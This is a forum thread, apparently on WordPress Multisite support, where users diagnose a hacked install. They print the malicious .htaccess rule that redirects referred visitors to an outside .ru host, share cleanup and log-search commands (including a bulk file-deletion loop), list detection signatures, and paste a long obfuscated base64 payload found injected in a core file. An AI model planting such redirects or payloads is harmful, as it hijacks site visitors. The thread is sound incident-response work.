WP MU sends all sites to www.google.com

For some reason, all the sites of my WP MU installation except for the main domain now redirect to google. I network disabled all the plugins, no joy. Anybody have any ideas? I have to demo this thing in the morning.

Make that clicking on any link inside the site redirects you to google also.

• Arnold

Check that your DNS wildcard is setup and working. A lot of hosts redirect to a search if they don't recognize the doman name. Also check that your .htaccess is correct. A lot of malware will insert extra stuff there. So if it just started happening after working correctly it's likely someones messing with your site.

If that doesn't help leave some of the domains that are redirecting and we'll take a look.

• diogenese19348

yeah, it looks like something or someone really nailed my .htaccess file. regrettably I need to go get my backup before I can do anything about it.

Here's what is in it now:

<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|msn|aol|infospace|lycos|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
    RewriteRule ^(.*)$ http://coolinter.ru/in.cgi?8 [R=301,L]
    </IfModule>

RewriteBase /
    RewriteEngine on

• in-mn

Hey - i just went through this as well.

Im using WP, Gforms, Theme my Login, Awesome Flickr Gallery, Google Doc Embedder, Category Posts

And a plethora of mostly paid (but scanned for base64) themes.

Hope this issue isnt common amongst this community.

You will have .htaccess all over your server. Dig around, you will also find a bunch of random php files as well.

Run this command

grep -iRl "google|ask|yahoo" *

it will output this 

clubi1/.htaccess
    myarea/public_html/.htaccess
    myarea/public_html/facebook/.htaccess
    myarea/public_html/bf/.htaccess
    myarea/public_html/wp-content/.htaccess
    myarea/public_html/wp-admin/.htaccess
    myarea/www/.htaccess
    myarea/www/facebook/.htaccess
    myarea/www/bf/.htaccess
    myarea/www/wp-content/.htaccess
    myarea/www/wp-admin/.htaccess

and this

clamscan -ir /home/*/public_html/ >> clamreport.txt
    cat clamreport.txt

this allows removal of bad .htaccess

for i ingrep -iRl "google|ask|yahoo" /home/myarea/public_html; do rm -f $i; done

When you figure out what ip was accessing the wp-xml.php shell, you can find what all else they accessed to ensure not posting elsewhere, but chances are theyre pretty smart.

grep POST /usr/local/apache/domlogs/clubhosting.org | grep 85.17.188.139

to find info on the file

root@host [/]# find -iname wp-xml.php
    ./home/myarea/public_html/wp-xml.php

it will give you ip

I changed all my passwords (except my multisite users).

SSH, Root, Local Cpnael, MySQL

How i cleaned up? Well - I didnt know which caused it. I gambled and left theme files up, but i removed all my WP files, and all my plugin files. I checked the user uploads area and the site folders

I ran scans for .php extensions once i deleted the core of WP and plugins.

Then i uploaded a fresh wp install, got new keys, etc.

Uploaded my plugins

Then opened up network admin.

And prayed. If theres an injection somewhere, I wont be able to find.

I had a lot of help from knownhost. They rock. Hope your Host is as good as them.

• James Dunn

Goodday @diogenese19348 and @in-mn

Might I ask you for some information about your respective hosting?

1) Who is your host?

2) Are you on shared hosting, VPS, or Dedicated Server?

3) Are you 100% sure your WP install is buttoned up well? (Don't take offense here, most people think there's is well buttoned up and I've had guys crack them in under ten minutes just to show it can be done.)

4) What info do you have in your .htaccess file - mainly the one where WP is installed?

5) Also, sorry for asking the obvious and you may have already stated it, but everything (WP, Plugins, Themes, etc are updated - correct?

6) Finally, do you have the Twenty-Ten and Twenty-Eleven themes installed - even if you are not using them and they are inactive? (Don't laugh, I have a reason for asking).

If I think of more Q's I'll post them, but this is the quick ones that come to mind.

• in-mn

@JamesDunn

No of course its not buttoned up well. I have way too many themes and plugins. I hope to at least make the 9 minute mark.

Im using knownhost, vps. Php SuExec (not DSO)

I only have the root htaccess with the mod rewrite per wp

No, i do not have twentyten and eleven removed. I did have a twenty ten based theme that was modified on site, since been pulled. But why those themes?

Do you have friends that do this 10 minutes of consulting for an affordable price?

• Arnold

These thjings usually get in from old not updated plugins. Common is the TimThumb vulnerability. A lot of thems use it for resizing images. Make sure everything is updated.

Change your passwords. If they got that far they probably know you cpanel or FTP passwords.

One of the ways to spot changes is to "touch" all the files on your server so they have the same timestamp. Then if you see an odd date you can decide if it's infected or an actual data file that can be written.

grep for instances of gzip and base64decode in your php files. .htaccess with redirects you don't recognize. Also I copy over fresh Wordpress files if I suspect a problem. That will often clean up most of the problem.

But don't be afraid to have your hosting company scan your server. They can do a better and more through job.

• diogenese19348

@JamesDunn

1) Who is your host?
    Register.com

2) Are you on shared hosting, VPS, or Dedicated Server?
    Shared Hosting.

3) Are you 100% sure your WP install is buttoned up well? (Don't take offense here, most people think there's is well buttoned up and I've had guys crack them in under ten minutes just to show it can be done.)
    No. I'm relatively new at this. I know it sure wasn't as of July 17th :stuck_out_tongue:

4) What info do you have in your .htaccess file - mainly the one where WP is installed?
    # BEGIN WordPress
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]

# uploaded files
    RewriteRule ^([_0-9a-zA-Z-]+/)?files/(.+) wp-includes/ms-files.php?file=$2 [L]

# add a trailing slash to /wp-admin
    RewriteRule ^([_0-9a-zA-Z-]+/)?wp-admin$ $1wp-admin/ [R=301,L]

RewriteCond %{REQUEST_FILENAME} -f [OR]
    RewriteCond %{REQUEST_FILENAME} -d
    RewriteRule ^ - [L]
    RewriteRule ^[_0-9a-zA-Z-]+/(wp-(content|admin|includes).*) $1 [L]
    RewriteRule ^[_0-9a-zA-Z-]+/(.*\.php)$ $1 [L]
    RewriteRule . index.php [L]
    # END WordPress

5) Also, sorry for asking the obvious and you may have already stated it, but everything (WP, Plugins, Themes, etc are updated - correct?
    Everything gets updated pretty much the day the updates come out - after I look at them of course.

6) Finally, do you have the Twenty-Ten and Twenty-Eleven themes installed - even if you are not using them and they are inactive? (Don't laugh, I have a reason for asking).
    Yes.

If I think of more Q's I'll post them, but this is the quick ones that come to mind.

• James Dunn

Goodday @in-mn.

I asked about TwentyTen and TwentyEleven (if inactive) because a friend of mine in Australia got cracked about six months back. Now, I don't believe this for a minute (yet), but I've decided to start documenting it to see if there's a pattern. Her hosting company told her that the cracker got in through some files in an inactive theme(s) that she had. The only two that she had inactive were TwentyTen and TwentyEleven and then she had the active theme she was using. As I said, I think that's a bunch of hooey from a host that was out on the back porch with Shaggy too many times, but I've just been curious when people get cracked.

"Friends" - none that I would admit to (LOL). Seriously, when I took a WP Security Course, the guy showed some videos posted by Black Hat Guys that were cracking websites in under 10 minutes. But, all joking aside, you may wish to check into this website - Hacker Target - and see what they come up with. For a $7 a month charge, it would be worth it for a month. BTW, that's not an affiliate link so don't worry.

Be sure to keep even inactive themes and plugins up to date. Many people make the mistake of thinking that because a theme or plugin is not active it doesn't need to stay up to date, but that's not entirely true. Updated is always best - active or inactive.

I was asking about your hosting because many times things slip in - and keep coming back - on shared hosting because some BOZO doesn't have his website secure. In that case, cheap is not always inexpensive. :wink:

@Arnold makes some excellent suggestions above as well.

BTW, for my clients (and potential clients from other developers), I usually run a four point test to see if their basic security is done. I'm certain that you've taken care of those four things so it may be of no value to you if I ran them on your website.

I really hope you get this sorted soon - getting hammered by a cracker is no fun. But continuing to have to clean up the mess from the original one is even less fun.

Take care.

James Dunn
    Athens, GA USA

• in-mn

Honestly i have pondered this and pondered this.

Personally - i think it was a plugin, that has a fairly large userbase, got hacked. However, which one - who knows. I know WPTouch always getting messed with. I think that one may be one of the biggest security risks out there.

But that is blindly accusing them.

I have since added some /8 to block hoping to cut down over 70% of my crack attempts.

I looked at doing some country based deny/allow rules, however, the server load on a database driven site on a VPS was just way too much. On top of running php suExec, etc.

I will try those sites. And i guess religiously monitor plugins. Assuming the wpmudev folks are lways careful, I have replaced many 3rd party ones with theirs. Even if i liked the layout of the 3rd party later, i should have to worry about wpmudev.

Once youre hacked though, that file will be posted to to create new files, rewrite rules, etc. Its a whole pain

• in-mn

I also had this come back the day I updates a different wpmudev plugin via automatic updates.

However, looking at logs I saw a whole lot of activity on ripe network bots banging on my wp-sign up and events calendar plugings

What other third party plugins do you use?

Some of mine are

The eventscalendar
    Wp touch
    Theme my login
    Gravity forms. W reg, PayPal, erc plugins
    Theme authenticity checker
    Category posts
    Awesomeflickr gallery
    Google documents embedder

If you guys do check you auto updated, it's be been a wp-XML.pho file every time for me.

• Arnold

That particular virus changes htaccess but it also embeds code in your wordpress files. If you search for a sstring like "base64_decode" or "gzinflate(base64_decode" you may find the virus. While these are valid PHP commands and may be used by your plugin they may also hide viruses.

Another common signature is "?><?php" . After the "<?php" immediately following a "?>" is where the code is injected.

The string #c3284d# is another common virus associated with changing the .htaccess

And there maybe stand alone php programs left that give them another backdoor into your system. Until you get them all
    You really need to get your hosting to scan everything and change your passwords.

• diogenese19348

I know about base64 and watch for that carefully. The other two I didn't know about and will can for.

Passwords got changed after the last virus outbreak, and I did have my host scan, they didn't come up with anything additional.

I do automatically refresh the WP install since the virus always changes the dates of some of those files. Rewriting them is faster than checking them all individually.

• in-mn

Hey awesome link. I found that

wp-includes/class-simplepie had issues, and guess what, wp-xml.php was back in my system after deleting and adding firewall

This is some strange behavior and the formatting looks different than the regular simple pie file

static $entities = array('Aacute' => "\xC3\x81", 'aacute' => "\xC3\xA1", 'Aacute;' => "\xC3\x81", 'aacute;' => "\xC3\xA1", 'Acirc' => "\xC3\x82", 'acirc' => "\xC3\xA2", 'Acirc;' => "\xC3\x82", 'acirc;' => "\xC3\xA2", 'acute' => "\xC2\xB4", 'acute;' => "\xC2\xB4", 'AElig' => "\xC3\x86", 'aelig' => "\xC3\xA6", 'AElig;' => "\xC3\x86", 'aelig;' => "\xC3\xA6", 'Agrave' => "\xC3\x80", 'agrave' => "\xC3\xA0", 'Agrave;' => "\xC3\x80", 'agrave;' => "\xC3\xA0", 'alefsym;' => "\xE2\x84\xB5", 'Alpha;' => "\xCE\x91", 'alpha;' => "\xCE\xB1", 'AMP' => "\x26", 'amp' => "\x26", 'AMP;' => "\x26", 'amp;' => "\x26", 'and;' => "\xE2\x88\xA7", 'ang;' => "\xE2\x88\xA0", 'apos;' => "\x27", 'Aring' => "\xC3\x85", 'aring' => "\xC3\xA5", 'Aring;' => "\xC3\x85", 'aring;' => "\xC3\xA5", 'asymp;' => "\xE2\x89\x88", 'Atilde' => "\xC3\x83", 'atilde' => "\xC3\xA3", 'Atilde;' => "\xC3\x83", 'atilde;' => "\xC3\xA3", 'Auml' => "\xC3\x84", 'auml' => "\xC3\xA4", 'Auml;' => "\xC3\x84", 'auml;' => "\xC3\xA4", 'bdquo;' => "\xE2\x80\x9E", 'Beta;' => "\xCE\x92", 'beta;' => "\xCE\xB2", 'brvbar' => "\xC2\xA6", 'brvbar;' => "\xC2\xA6", 'bull;' => "\xE2\x80\xA2", 'cap;' => "\xE2\x88\xA9", 'Ccedil' => "\xC3\x87", 'ccedil' => "\xC3\xA7", 'Ccedil;' => "\xC3\x87", 'ccedil;' => "\xC3\xA7", 'cedil' => "\xC2\xB8", 'cedil;' => "\xC2\xB8", 'cent' => "\xC2\xA2", 'cent;' => "\xC2\xA2", 'Chi;' => "\xCE\xA7", 'chi;' => "\xCF\x87", 'circ;' => "\xCB\x86", 'clubs;' => "\xE2\x99\xA3", 'cong;' => "\xE2\x89\x85", 'COPY' => "\xC2\xA9", 'copy' => "\xC2\xA9", 'COPY;' => "\xC2\xA9", 'copy;' => "\xC2\xA9", 'crarr;' => "\xE2\x86\xB5", 'cup;' => "\xE2\x88\xAA", 'curren' => "\xC2\xA4", 'curren;' => "\xC2\xA4", 'Dagger;' => "\xE2\x80\xA1", 'dagger;' => "\xE2\x80\xA0", 'dArr;' => "\xE2\x87\x93", 'darr;' => "\xE2\x86\x93", 'deg' => "\xC2\xB0", 'deg;' => "\xC2\xB0", 'Delta;' => "\xCE\x94", 'delta;' => "\xCE\xB4", 'diams;' => "\xE2\x99\xA6", 'divide' => "\xC3\xB7", 'divide;' => "\xC3\xB7", 'Eacute' => "\xC3\x89", 'eacute' => "\xC3\xA9", 'Eacute;' => "\xC3\x89", 'eacute;' => "\xC3\xA9", 'Ecirc' => "\xC3\x8A", 'ecirc' => "\xC3\xAA", 'Ecirc;' => "\xC3\x8A", 'ecirc;' => "\xC3\xAA", 'Egrave' => "\xC3\x88", 'egrave' => "\xC3\xA8", 'Egrave;' => "\xC3\x88", 'egrave;' => "\xC3\xA8", 'empty;' => "\xE2\x88\x85", 'emsp;' => "\xE2\x80\x83", 'ensp;' => "\xE2\x80\x82", 'Epsilon;' => "\xCE\x95", 'epsilon;' => "\xCE\xB5", 'equiv;' => "\xE2\x89\xA1", 'Eta;' => "\xCE\x97", 'eta;' => "\xCE\xB7", 'ETH' => "\xC3\x90", 'eth' => "\xC3\xB0", 'ETH;' => "\xC3\x90", 'eth;' => "\xC3\xB0", 'Euml' => "\xC3\x8B", 'euml' => "\xC3\xAB", 'Euml;' => "\xC3\x8B", 'euml;' => "\xC3\xAB", 'euro;' => "\xE2\x82\xAC", 'exist;' => "\xE2\x88\x83", 'fnof;' => "\xC6\x92", 'forall;' => "\xE2\x88\x80", 'frac12' => "\xC2\xBD", 'frac12;' => "\xC2\xBD", 'frac14' => "\xC2\xBC", 'frac14;' => "\xC2\xBC", 'frac34' => "\xC2\xBE", 'frac34;' => "\xC2\xBE", 'frasl;' => "\xE2\x81\x84", 'Gamma;' => "\xCE\x93", 'gamma;' => "\xCE\xB3", 'ge;' => "\xE2\x89\xA5", 'GT' => "\x3E", 'gt' => "\x3E", 'GT;' => "\x3E", 'gt;' => "\x3E", 'hArr;' => "\xE2\x87\x94", 'harr;' => "\xE2\x86\x94", 'hearts;' => "\xE2\x99\xA5", 'hellip;' => "\xE2\x80\xA6", 'Iacute' => "\xC3\x8D", 'iacute' => "\xC3\xAD", 'Iacute;' => "\xC3\x8D", 'iacute;' => "\xC3\xAD", 'Icirc' => "\xC3\x8E", 'icirc' => "\xC3\xAE", 'Icirc;' => "\xC3\x8E", 'icirc;' => "\xC3\xAE", 'iexcl' => "\xC2\xA1", 'iexcl;' => "\xC2\xA1", 'Igrave' => "\xC3\x8C", 'igrave' => "\xC3\xAC", 'Igrave;' => "\xC3\x8C", 'igrave;' => "\xC3\xAC", 'image;' => "\xE2\x84\x91", 'infin;' => "\xE2\x88\x9E", 'int;' => "\xE2\x88\xAB", 'Iota;' => "\xCE\x99", 'iota;' => "\xCE\xB9", 'iquest' => "\xC2\xBF", 'iquest;' => "\xC2\xBF", 'isin;' => "\xE2\x88\x88", 'Iuml' => "\xC3\x8F", 'iuml' => "\xC3\xAF", 'Iuml;' => "\xC3\x8F", 'iuml;' => "\xC3\xAF", 'Kappa;' => "\xCE\x9A", 'kappa;' => "\xCE\xBA", 'Lambda;' => "\xCE\x9B", 'lambda;' => "\xCE\xBB", 'lang;' => "\xE3\x80\x88", 'laquo' => "\xC2\xAB", 'laquo;' => "\xC2\xAB", 'lArr;' => "\xE2\x87\x90", 'larr;' => "\xE2\x86\x90", 'lceil;' => "\xE2\x8C\x88", 'ldquo;' => "\xE2\x80\x9C", 'le;' => "\xE2\x89\xA4", 'lfloor;' => "\xE2\x8C\x8A", 'lowast;' => "\xE2\x88\x97", 'loz;' => "\xE2\x97\x8A", 'lrm;' => "\xE2\x80\x8E", 'lsaquo;' => "\xE2\x80\xB9", 'lsquo;' => "\xE2\x80\x98", 'LT' => "\x3C", 'lt' => "\x3C", 'LT;' => "\x3C", 'lt;' => "\x3C", 'macr' => "\xC2\xAF", 'macr;' => "\xC2\xAF", 'mdash;' => "\xE2\x80\x94", 'micro' => "\xC2\xB5", 'micro;' => "\xC2\xB5", 'middot' => "\xC2\xB7", 'middot;' => "\xC2\xB7", 'minus;' => "\xE2\x88\x92", 'Mu;' => "\xCE\x9C", 'mu;' => "\xCE\xBC", 'nabla;' => "\xE2\x88\x87", 'nbsp' => "\xC2\xA0", 'nbsp;' => "\xC2\xA0", 'ndash;' => "\xE2\x80\x93", 'ne;' => "\xE2\x89\xA0", 'ni;' => "\xE2\x88\x8B", 'not' => "\xC2\xAC", 'not;' => "\xC2\xAC", 'notin;' => "\xE2\x88\x89", 'nsub;' => "\xE2\x8A\x84", 'Ntilde' => "\xC3\x91", 'ntilde' => "\xC3\xB1", 'Ntilde;' => "\xC3\x91", 'ntilde;' => "\xC3\xB1", 'Nu;' => "\xCE\x9D", 'nu;' => "\xCE\xBD", 'Oacute' => "\xC3\x93", 'oacute' => "\xC3\xB3", 'Oacute;' => "\xC3\x93", 'oacute;' => "\xC3\xB3", 'Ocirc' => "\xC3\x94", 'ocirc' => "\xC3\xB4", 'Ocirc;' => "\xC3\x94", 'ocirc;' => "\xC3\xB4", 'OElig;' => "\xC5\x92", 'oelig;' => "\xC5\x93", 'Ograve' => "\xC3\x92", 'ograve' => "\xC3\xB2", 'Ograve;' => "\xC3\x92", 'ograve;' => "\xC3\xB2", 'oline;' => "\xE2\x80\xBE", 'Omega;' => "\xCE\xA9", 'omega;' => "\xCF\x89", 'Omicron;' => "\xCE\x9F", 'omicron;' => "\xCE\xBF", 'oplus;' => "\xE2\x8A\x95", 'or;' => "\xE2\x88\xA8", 'ordf' => "\xC2\xAA", 'ordf;' => "\xC2\xAA", 'ordm' => "\xC2\xBA", 'ordm;' => "\xC2\xBA", 'Oslash' => "\xC3\x98", 'oslash' => "\xC3\xB8", 'Oslash;' => "\xC3\x98", 'oslash;' => "\xC3\xB8", 'Otilde' => "\xC3\x95", 'otilde' => "\xC3\xB5", 'Otilde;' => "\xC3\x95", 'otilde;' => "\xC3\xB5", 'otimes;' => "\xE2\x8A\x97", 'Ouml' => "\xC3\x96", 'ouml' => "\xC3\xB6", 'Ouml;' => "\xC3\x96", 'ouml;' => "\xC3\xB6", 'para' => "\xC2\xB6", 'para;' => "\xC2\xB6", 'part;' => "\xE2\x88\x82", 'permil;' => "\xE2\x80\xB0", 'perp;' => "\xE2\x8A\xA5", 'Phi;' => "\xCE\xA6", 'phi;' => "\xCF\x86", 'Pi;' => "\xCE\xA0", 'pi;' => "\xCF\x80", 'piv;' => "\xCF\x96", 'plusmn' => "\xC2\xB1", 'plusmn;' => "\xC2\xB1", 'pound' => "\xC2\xA3", 'pound;' => "\xC2\xA3", 'Prime;' => "\xE2\x80\xB3", 'prime;' => "\xE2\x80\xB2", 'prod;' => "\xE2\x88\x8F", 'prop;' => "\xE2\x88\x9D", 'Psi;' => "\xCE\xA8", 'psi;' => "\xCF\x88", 'QUOT' => "\x22", 'quot' => "\x22", 'QUOT;' => "\x22", 'quot;' => "\x22", 'radic;' => "\xE2\x88\x9A", 'rang;' => "\xE3\x80\x89", 'raquo' => "\xC2\xBB", 'raquo;' => "\xC2\xBB", 'rArr;' => "\xE2\x87\x92", 'rarr;' => "\xE2\x86\x92", 'rceil;' => "\xE2\x8C\x89", 'rdquo;' => "\xE2\x80\x9D", 'real;' => "\xE2\x84\x9C", 'REG' => "\xC2\xAE", 'reg' => "\xC2\xAE", 'REG;' => "\xC2\xAE", 'reg;' => "\xC2\xAE", 'rfloor;' => "\xE2\x8C\x8B", 'Rho;' => "\xCE\xA1", 'rho;' => "\xCF\x81", 'rlm;' => "\xE2\x80\x8F", 'rsaquo;' => "\xE2\x80\xBA", 'rsquo;' => "\xE2\x80\x99", 'sbquo;' => "\xE2\x80\x9A", 'Scaron;' => "\xC5\xA0", 'scaron;' => "\xC5\xA1", 'sdot;' => "\xE2\x8B\x85", 'sect' => "\xC2\xA7", 'sect;' => "\xC2\xA7", 'shy' => "\xC2\xAD", 'shy;' => "\xC2\xAD", 'Sigma;' => "\xCE\xA3", 'sigma;' => "\xCF\x83", 'sigmaf;' => "\xCF\x82", 'sim;' => "\xE2\x88\xBC", 'spades;' => "\xE2\x99\xA0", 'sub;' => "\xE2\x8A\x82", 'sube;' => "\xE2\x8A\x86", 'sum;' => "\xE2\x88\x91", 'sup;' => "\xE2\x8A\x83", 'sup1' => "\xC2\xB9", 'sup1;' => "\xC2\xB9", 'sup2' => "\xC2\xB2", 'sup2;' => "\xC2\xB2", 'sup3' => "\xC2\xB3", 'sup3;' => "\xC2\xB3", 'supe;' => "\xE2\x8A\x87", 'szlig' => "\xC3\x9F", 'szlig;' => "\xC3\x9F", 'Tau;' => "\xCE\xA4", 'tau;' => "\xCF\x84", 'there4;' => "\xE2\x88\xB4", 'Theta;' => "\xCE\x98", 'theta;' => "\xCE\xB8", 'thetasym;' => "\xCF\x91", 'thinsp;' => "\xE2\x80\x89", 'THORN' => "\xC3\x9E", 'thorn' => "\xC3\xBE", 'THORN;' => "\xC3\x9E", 'thorn;' => "\xC3\xBE", 'tilde;' => "\xCB\x9C", 'times' => "\xC3\x97", 'times;' => "\xC3\x97", 'TRADE;' => "\xE2\x84\xA2", 'trade;' => "\xE2\x84\xA2", 'Uacute' => "\xC3\x9A", 'uacute' => "\xC3\xBA", 'Uacute;' => "\xC3\x9A", 'uacute;' => "\xC3\xBA", 'uArr;' => "\xE2\x87\x91", 'uarr;' => "\xE2\x86\x91", 'Ucirc' => "\xC3\x9B", 'ucirc' => "\xC3\xBB", 'Ucirc;' => "\xC3\x9B", 'ucirc;' => "\xC3\xBB", 'Ugrave' => "\xC3\x99", 'ugrave' => "\xC3\xB9", 'Ugrave;' => "\xC3\x99", 'ugrave;' => "\xC3\xB9", 'uml' => "\xC2\xA8", 'uml;' => "\xC2\xA8", 'upsih;' => "\xCF\x92", 'Upsilon;' => "\xCE\xA5", 'upsilon;' => "\xCF\x85", 'Uuml' => "\xC3\x9C", 'uuml' => "\xC3\xBC", 'Uuml;' => "\xC3\x9C", 'uuml;' => "\xC3\xBC", 'weierp;' => "\xE2\x84\x98", 'Xi;' => "\xCE\x9E", 'xi;' => "\xCE\xBE", 'Yacute' => "\xC3\x9D", 'yacute' => "\xC3\xBD", 'Yacute;' => "\xC3\x9D", 'yacute;' => "\xC3\xBD", 'yen' => "\xC2\xA5", 'yen;' => "\xC2\xA5", 'yuml' => "\xC3\xBF", 'Yuml;' => "\xC5\xB8", 'yuml;' => "\xC3\xBF", 'Zeta;' => "\xCE\x96", 'zeta;' => "\xCE\xB6", 'zwj;' => "\xE2\x80\x8D", 'zwnj;' => "\xE2\x80\x8C");
  • in-mn

bah thats not it..

sorry it was this

it was a preg replace of /.* with

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